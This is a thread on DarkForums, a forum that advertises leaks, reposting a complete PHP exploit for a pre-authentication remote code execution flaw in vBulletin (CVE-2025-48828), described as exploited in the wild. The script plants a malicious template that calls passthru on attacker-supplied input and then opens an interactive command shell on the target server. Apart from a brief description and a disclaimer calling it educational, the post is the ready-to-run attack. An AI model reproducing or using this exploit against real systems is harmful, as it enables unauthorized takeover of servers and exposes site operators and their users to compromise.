Login   Register
Upgrade your account to access Premium section
Access to DarkForums Private Archive Telegram Channel
Old Telegram is Banned Join our new Telegram Channel

Thread Rating:
  • 0 Vote(s) - 0 Average
  • 1
  • 2
  • 3
  • 4
  • 5
559[CVE-2025-48828] Pre-Auth vBulletin RCE (replaceAdTemplate)

Original Poster
cache
3
REP
0
LIKES

DarkForums Members
Members
Joined: May 2025
Threads: 4
Posts: 13
Credits: 4.00 [+]
1 Month


STAFF TEAM
#1
14-06-25, 01:11 AM
Certain vBulletin versions might allow attackers to execute arbitrary PHP code by abusing Template Conditionals in the template engine. By crafting template code in an alternative PHP function invocation syntax, such as the "var_dump"("test") syntax, attackers can bypass security checks and execute arbitrary PHP code, as exploited in the wild in May 2025.

Exploit Code:
Code:
<?php

/*
    -----------------------------------------------------------------
    vBulletin (replaceAdTemplate) Remote Code Execution Vulnerability
    -----------------------------------------------------------------
    +-------------------------------------------------------------------------+
    | This proof of concept code was written for educational purpose only.    |
    | Use it at your own risk. Author will be not responsible for any damage. |
    +-------------------------------------------------------------------------+
    [-] Technical Writeup:
    https://karmainsecurity.com/dont-call-that-protected-method-vbulletin-rce
*/

set_time_limit(0);
error_reporting(E_ERROR);

print "\n+---------------------------------------------------------------------+";
print "\n| vBulletin (replaceAdTemplate) Remote Code Execution Exploit by EgiX |";
print "\n+---------------------------------------------------------------------+\n";

if (!extension_loaded("curl")) die("\n[-] cURL extension required!\n\n");

if ($argc != 2)
{
    print "\nUsage......: php $argv[0] <URL>\n";
    print "\nExample....: php $argv[0] http://localhost/vb/";
    print "\nExample....: php $argv[0] https://vbulletin.com/\n\n";
    die();
}

$params = [
        "routestring" => "ajax/api/ad/replaceAdTemplate",
        "styleid" => "1",
        "location" => "d4rkf0rum5",
        "template" => "<vb:if condition='\"passthru\"(\$_POST[\"cmd\"])'></vb:if>"
];

$ch = curl_init();

curl_setopt($ch, CURLOPT_URL, $argv[1]);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($params));

if (curl_exec($ch) !== "null") die("\n[-] Exploit failed, unable to create template!\n\n");

$params = ["routestring" => "ajax/render/ad_d4rkf0rum5"];

while (1)
{
    print "\nvBulletin-shell# ";
    if (($cmd = trim(fgets(STDIN))) == "exit") break;
    $params["cmd"] = $cmd;
    curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($params));
    preg_match('/(.+)\{"template":/s', curl_exec($ch), $m) ? print $m[1] : die("\n[-] Exploit failed!\n\n");
}

Reply to this thread




Extras

Changelog

Awards

Credits

BanLists

Canary

Account

Control Panel

Upgrade

2 Factor Authentication

Useful Links

Rules & Guidelines

Advertising

Team

Contact Us

ABOUT US

DarkForums is a discussion forum about gaming, technology and various other interesting topics with lots of exclusive leaks.
If you would like to contact the staff team, please send one of our staff members a message or Contact Us .